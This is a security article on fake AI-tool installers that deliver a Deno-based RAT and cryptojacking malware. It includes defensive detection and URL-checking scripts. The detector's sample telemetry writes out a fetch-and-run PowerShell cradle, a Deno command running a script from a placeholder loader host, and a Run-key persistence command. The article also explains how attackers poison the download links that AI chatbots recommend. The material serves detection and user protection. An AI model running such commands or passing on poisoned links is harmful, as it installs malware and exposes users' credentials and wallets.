What Fake AI Installers Are and Why They Matter
Fake AI installers are counterfeit setup files or scripts that pretend to install popular AI tools or utilities but instead deliver malware, enabling credential theft, cryptojacking, and persistent remote access to victims’ systems. They borrow the names of well-known products such as ChatGPT and Claude, or of trusted PC utilities, and are distributed through channels that look credible at a glance: GitHub and SourceForge repositories, and download links surfaced by AI chatbots. Threat actors exploit user trust in open-source platforms and AI recommendations to make malware downloads appear genuine. Because many targets are developers, creators, and gamers, the stakes are high: a compromised system can leak cryptocurrency wallets, browser sessions, and chat accounts, and a powerful GPU can be hijacked for cryptomining. Understanding how these downloads work is the first step toward avoiding them.

How Deno RAT Malware Hides Inside Fake ChatGPT and Claude Installers
Recent GitHub malware campaigns use repositories that masquerade as installers or plugins for tools like ChatGPT, Claude, AutoTune, Kontakt, Ableton Live, and ZENOLOGY. Visitors are instructed to open a terminal and paste commands that fetch MSI installers or PowerShell scripts from GitHub for Windows and macOS. On Windows, these scripts install the Scoop and WinGet package managers, then use them to pull the legitimate Deno runtime, which fetches the DinDoor backdoor from a remote server and runs it in memory rather than from a file on disk. DinDoor maintains persistence, reports system data, and delivers a Deno-based RAT known as Smokest. This RAT can run commands, capture screenshots, manage files, open SOCKS5 proxies, and steal from more than 50 cryptocurrency wallet browser extensions and several wallet apps, including Atomic Wallet and Exodus. According to Malwarebytes, the campaign drives traffic to these repositories through compromised YouTube channels posting AI-generated videos, some with more than 50,000 views.

Screen Streaming, Browser Abuse, and Stealthy Credential Theft
Beyond typical data theft, the Deno-based RAT features a stealthy screen streaming capability that makes these fake AI installers especially dangerous. To watch a victim’s activity in real time, the malware silently launches Microsoft Edge, connects to it through the Chrome DevTools Protocol, and injects a WebRTC page. Edge then relays encrypted video frames directly to the attacker over a peer-to-peer connection, hiding the stream inside a legitimate browser process and helping it evade network inspection. At the same time, the stealer module targets Chromium-based browsers like Chrome, Brave, Edge, Opera, and Vivaldi, as well as Telegram, Discord, and Lightcord, gathering cookies, sessions, and stored credentials. Since persistence is set through registry Run keys and every stage uses mainstream tools such as Scoop, WinGet, and Deno, many security solutions see nothing unusual. The individual tools are legitimate; the combination is not. A Deno process that spawns a hidden Edge instance, or a Run key whose command is the Deno runtime pointed at a remote URL, is the anomaly worth hunting for. The result is a potent mix of remote access, surveillance, and credential theft wrapped in a convincing AI tool installer.
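The chain above is built from legitimate tools, so a useful detection keys on the relationships between processes rather than on any single binary. The following is an added example, not code from the article, from Malwarebytes, or from the malware itself: four process-tree rules run over constructed Sysmon-style process-creation events. The sample command lines, the placeholder GitHub and loader URLs, and the assumption that the RAT exposes the Chrome DevTools Protocol by starting Edge with --remote-debugging-port are all mine; the article only states that CDP is used.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the Sysmon Event ID 1 fields we need)."""
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # its command line


# Patterns for the stages the article describes. Treating --remote-debugging-port
# as the way the RAT exposes CDP is an assumption; the article only says CDP is used.
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|iex|Invoke-Expression)\b",
    re.IGNORECASE,
)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)
DEVTOOLS_FLAG = re.compile(r"--remote-debugging-(port|pipe)\b", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
BROWSERS = {"msedge.exe", "chrome.exe", "brave.exe", "opera.exe", "vivaldi.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[tuple[str, int]]:
    """Return (rule_name, pid) for every event that matches one of the four rules."""
    by_pid = {e.pid: e for e in events}
    findings: list[tuple[str, int]] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""

        # Rule 1: the Deno runtime executing a script fetched straight from a URL.
        if name == "deno.exe" and REMOTE_URL.search(e.cmdline):
            findings.append(("deno_runs_remote_script", e.pid))

        # Rule 2: Deno spawned by a shell that is itself running a download cradle
        # (the "paste this into your terminal" step from the repository page).
        if name == "deno.exe" and pname in SCRIPT_HOSTS and DOWNLOAD_CRADLE.search(parent.cmdline):
            findings.append(("cradle_to_deno_chain", e.pid))

        # Rule 3: a Chromium browser started with DevTools remote debugging by
        # something other than the desktop shell or another browser process.
        if name in BROWSERS and DEVTOOLS_FLAG.search(e.cmdline) and pname not in BROWSERS | {"explorer.exe"}:
            findings.append(("browser_devtools_from_script", e.pid))

        # Rule 4: Run-key persistence whose value points at the Deno runtime.
        if RUN_KEY.search(e.cmdline) and "deno" in e.cmdline.lower():
            findings.append(("run_key_persistence_deno", e.pid))
    return findings


# Constructed sample telemetry (not real logs): the victim pastes the repository's
# command into PowerShell; the chain ends with Edge opened for screen streaming and
# a Run key pointing at Deno. ORG/REPO and loader.example are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "irm https://raw.githubusercontent.com/ORG/REPO/main/setup.ps1 | iex"'),
    ProcEvent(210, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "scoop install deno"'),
    ProcEvent(220, 200, r"C:\Users\victim\scoop\apps\deno\current\deno.exe",
              "deno run -A --no-prompt https://loader.example/stage2.ts"),
    ProcEvent(230, 220, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              r"msedge.exe --headless --remote-debugging-port=9222 --user-data-dir=C:\Users\victim\AppData\Local\Temp\edgeprof"),
    ProcEvent(240, 220, r"C:\Windows\System32\reg.exe",
              r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d "C:\Users\victim\scoop\apps\deno\current\deno.exe run -A https://loader.example/stage2.ts" /f'),
    # Benign: the user opens Edge normally from the desktop.
    ProcEvent(300, 100, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              "msedge.exe https://www.bing.com/"),
]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Run as written, the script flags pids 220, 230, and 240 and stays quiet on the normal Edge launch. Rule 3 will also fire on legitimate browser automation (Puppeteer or Selenium driving a browser from node.exe or python.exe), so tune its parent exclusions to your fleet rather than suppressing it; rule 4 is the one to pair with Run-key write events from your EDR, since the registry value survives reboots even after the Deno process is gone.
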

AI Chatbots and Cryptojacking Malware Targeting Gamers
Threat actors are also turning AI chatbots themselves into part of the malware delivery chain. Microsoft Defender Experts reported an active cryptojacking campaign in which AI chatbots recommended malicious domains posing as official download sites for popular PC utilities like CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack, and PDFgear. These fake downloads install cryptojacking malware aimed at users with high-performance GPUs, who offer better cryptocurrency mining potential. According to Microsoft, the same campaign not only mines cryptocurrency but also “establishes persistent remote access” by abusing the legitimate ScreenConnect remote-support tool, opening the door to data theft, lateral movement, or even ransomware. This AI search-result poisoning extends traditional SEO poisoning: instead of only poisoning search engines, attackers seed malicious sites that AI chatbots then present as trustworthy download links, catching users who rely on chatbot recommendations when looking for software.

How to Verify Downloads, Spot Fake AI Installers, and Stay Safe
To avoid fake AI installers and other malware downloads, always start from official project pages or trusted vendor sites, not links from random videos, forums, or chatbot answers. When you must use sites like GitHub or SourceForge, verify that the repository belongs to the official organization or developer, check its history, release notes, and community activity, and never paste terminal commands from an unknown account: a “copy this into PowerShell” install step is the defining red flag of the campaign described above. On Windows and macOS, inspect installer signatures before running them and confirm they are signed by the expected publisher; on Windows, Get-AuthenticodeSignature should report a Valid status and the vendor’s name in the signer, and on macOS, pkgutil --check-signature (for .pkg files) or codesign -dv --verbose=4 (for apps) shows the signing identity. Be wary of scripts that install extra package managers or runtimes without a clear reason: a product installer has no business pulling in Scoop, WinGet, or Deno on its own. For AI chatbots, treat download URLs as suggestions to verify, not links to click blindly. Cross-check them in your browser’s address bar and through a search, and confirm that the registered domain, not just a familiar-looking prefix, matches the vendor’s official domain. Finally, keep endpoint protection enabled, use cloud-delivered protection and EDR features where available, and watch systems with high-end GPUs for sustained GPU load while they are otherwise idle.
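Checking a chatbot-suggested URL by eye is where most people slip, because the lookalikes put the real vendor name somewhere in the address. The following is an added example, not code from the article or from Microsoft: a small checker that only accepts an HTTPS URL whose host is an allowed official domain or a subdomain of one, and rejects the common tricks (real name as a prefix of an attacker domain, hyphen or typo variants, userinfo before an @, punycode hosts). The two allowlist entries are the vendor domains as I know them and are an assumption for the reader to confirm on the vendors’ own pages; the suggested URLs are constructed for illustration and are not campaign indicators.

```python
from __future__ import annotations

from urllib.parse import urlsplit

# Constructed allowlist. The domains are the vendors' own sites as I know them
# (an assumption for the reader to confirm on the vendor pages), not data from
# the article. Add one entry per tool you actually download.
OFFICIAL_DOMAINS: dict[str, set[str]] = {
    "CrystalDiskInfo": {"crystalmark.info"},
    "HWMonitor": {"cpuid.com"},
}


def check_download_url(url: str, allowed: set[str]) -> tuple[bool, str]:
    """Decide whether a suggested download URL lands on an allowed official domain.

    Matching is exact-or-subdomain on the allowed domain, which defeats the usual
    lookalikes: the real name as a *prefix* of an attacker domain, typo or hyphen
    variants, and userinfo tricks that place the real name before an '@'.
    """
    parts = urlsplit(url.strip())
    if parts.scheme.lower() != "https":
        return False, f"scheme is {parts.scheme or 'missing'}, not https"
    if parts.username is not None:
        return False, "userinfo before the host hides the real domain"
    host = (parts.hostname or "").rstrip(".")   # hostname is already lower-cased
    if not host:
        return False, "no host in URL"
    if not host.isascii() or any(label.startswith("xn--") for label in host.split(".")):
        return False, "non-ASCII or punycode host; possible homoglyph, verify by hand"
    for domain in allowed:
        if host == domain or host.endswith("." + domain):
            return True, f"host is {domain} or a subdomain of it"
    return False, f"{host} is not an official domain for this tool"


# Constructed chatbot-style suggestions for CrystalDiskInfo (not real campaign URLs).
SUGGESTED = [
    "https://crystalmark.info/en/software/crystaldiskinfo/",
    "http://crystalmark.info/en/download/",                                 # plaintext downgrade
    "https://crystalmark.info.free-downloads.example/CrystalDiskInfo.exe",  # real name as prefix
    "https://crystalmark-info.example/setup.exe",                           # hyphen variant
    "https://crystalmark.info@cdn.example/get",                             # userinfo trick
    "https://xn--crystlmark-8bb.info/",                                     # punycode host
]


def triage(urls: list[str], tool: str) -> list[tuple[str, bool]]:
    """Return (url, accepted) for each suggestion against the tool's allowlist."""
    return [(u, check_download_url(u, OFFICIAL_DOMAINS[tool])[0]) for u in urls]


if __name__ == "__main__":
    for u in SUGGESTED:
        ok, why = check_download_url(u, OFFICIAL_DOMAINS["CrystalDiskInfo"])
        print("OK    " if ok else "REJECT", u, "-", why)
```

Only the first suggestion passes. The allowlist is the weak point: it has to come from a source you trust (the vendor’s own site), never from the chatbot answer you are trying to verify. Subdomain matching trusts every subdomain of an allowed domain, so never allowlist a shared hosting domain such as github.io or sourceforge.net wholesale; allowlist the specific project instead. Passing this check only means the domain is right, and the signature check on the downloaded file is still the next step.
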
